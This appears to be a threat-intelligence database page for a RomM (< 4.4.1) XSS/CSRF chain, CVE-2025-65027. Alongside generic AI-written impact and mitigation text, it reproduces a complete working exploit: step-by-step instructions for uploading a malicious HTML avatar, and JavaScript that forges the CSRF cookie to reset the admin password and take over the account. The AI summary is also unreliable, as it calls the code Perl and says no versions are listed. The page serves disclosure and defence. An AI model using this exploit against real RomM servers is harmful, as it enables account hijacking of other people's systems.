RomM 4.4.0 - XSS_CSRF Chain
RomM 4.4.0 - XSS_CSRF Chain
AI Analysis
Technical Summary
RomM 4.4.0 suffers from a vulnerability chain involving XSS and CSRF, allowing an attacker to leverage injected scripts to perform unauthorized requests on behalf of a victim. The exploit combines these two web attack vectors to bypass typical protections. The exploit code is published on Exploit-DB (ID 52505) and is written in Perl. No affected versions list or patch information is provided, and the service is not cloud-hosted.
Potential Impact
Successful exploitation could allow an attacker to execute malicious scripts in the context of a victim's browser and perform unauthorized actions without the victim's consent. This could lead to session hijacking, unauthorized state changes, or other web application abuses depending on the application's functionality.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider implementing web application firewall rules to detect and block XSS and CSRF attack patterns, and apply standard CSRF protections such as anti-CSRF tokens.
Indicators of Compromise
- exploit-code: # Exploit Title: RomM < 4.4.1 - XSS_CSRF Chain # Date: 2025-12-03 # Exploit Author: He4am (https://github.com/mHe4am) # Vendor Homepage: https://romm.app/ # Software Link: https://github.com/rommapp/romm (Docker: https://hub.docker.com/r/rommapp/romm) # Version: < 4.4.1 # Tested on: Linux # CVE: CVE-2025-65027 # ------------------- # Vulnerability: Chaining unrestricted file upload (XSS) + CSRF token reuse to bypass SameSite protection # Impact: Admin account takeover # Prerequisites: # 1. Attacker needs an authenticated account (Viewer role is sufficient) # 2. Victim must visit the uploaded malicious HTML file via a direct link # Steps to reproduce: # 1. Login to RomM # 2. Obtain your CSRF token: # - Open browser DevTools > Application tab (or Storage on Firefox) > Cookies # - Copy the `romm_csrftoken` cookie value # 3. Replace <ATTACKER_CSRF_TOKEN> below with your token # 4. Replace <TARGET_ROMM_URL> with the target RomM instance URL (e.g., http://romm.local) # 5. Save this file as `avatar.html` # 6. Upload it as your profile avatar (http://romm.local/user/me) and click the Apply button # 7. Locate the uploaded file's direct link: # - DevTools > Network tab > Filter for `.html` files # - Or capture it via proxy (e.g., Burp Suite) # - It's usually something like: "http://romm.local/assets/romm/assets/users/<Random-ID>/profile/avatar.html" # 8. Send this direct link of the uploaded avatar/file to the victim # 9. When victim (e.g. admin) opens the link, their password will be changed to "Passw0rd" # ------------------- # PoC Code: <script> const csrfToken = "<ATTACKER_CSRF_TOKEN>"; // CHANGE THIS - Your CSRF token from step 2 const targetURL = "<TARGET_ROMM_URL>"; // CHANGE THIS - Target RomM URL (e.g., http://romm.local) const targetUserID = 1; // Default admin ID is always 1, CHANGE THIS if needed const newPassword = "Passw0rd"; // Password to set for victim // Overwrite CSRF cookie to match our token document.cookie = `romm_csrftoken=${csrfToken}; path=/`; // Execute account takeover by forcing the victim to change their password fetch(targetURL + "/api/users/" + targetUserID, { method: 'PUT', credentials: 'include', // Send victim's session cookie headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'x-csrftoken': csrfToken }, body: "password=" + newPassword }) .then(() => { console.log("Password changed successfully"); }) .catch(err => { console.error("Attack failed:", err); }); </script> # ------------------- # See full writeup for technical details: https://he4am.medium.com/bypassing-samesite-protection-chaining-xss-and-csrf-for-admin-ato-in-romm-44d910c54403
RomM 4.4.0 - XSS_CSRF Chain
Description
RomM 4.4.0 - XSS_CSRF Chain
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
RomM 4.4.0 suffers from a vulnerability chain involving XSS and CSRF, allowing an attacker to leverage injected scripts to perform unauthorized requests on behalf of a victim. The exploit combines these two web attack vectors to bypass typical protections. The exploit code is published on Exploit-DB (ID 52505) and is written in Perl. No affected versions list or patch information is provided, and the service is not cloud-hosted.
Potential Impact
Successful exploitation could allow an attacker to execute malicious scripts in the context of a victim's browser and perform unauthorized actions without the victim's consent. This could lead to session hijacking, unauthorized state changes, or other web application abuses depending on the application's functionality.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider implementing web application firewall rules to detect and block XSS and CSRF attack patterns, and apply standard CSRF protections such as anti-CSRF tokens.
Technical Details
- Edb Id
- 52505
- Has Exploit Code
- true
- Code Language
- perl
Indicators of Compromise
Exploit Source Code
Exploit code for RomM 4.4.0 - XSS_CSRF Chain
# Exploit Title: RomM < 4.4.1 - XSS_CSRF Chain # Date: 2025-12-03 # Exploit Author: He4am (https://github.com/mHe4am) # Vendor Homepage: https://romm.app/ # Software Link: https://github.com/rommapp/romm (Docker: https://hub.docker.com/r/rommapp/romm) # Version: < 4.4.1 # Tested on: Linux # CVE: CVE-2025-65027 # ------------------- # Vulnerability: Chaining unrestricted file upload (XSS) + CSRF token reuse to bypass SameSite protection # Impact: Admin account takeover # Prerequisites: # 1. A... (2182 more characters)
Threat ID: 69d842c21cc7ad14da3f5b10
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/17/2026, 2:43:03 PM
Last updated: 5/24/2026, 9:49:43 PM
Views: 66
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.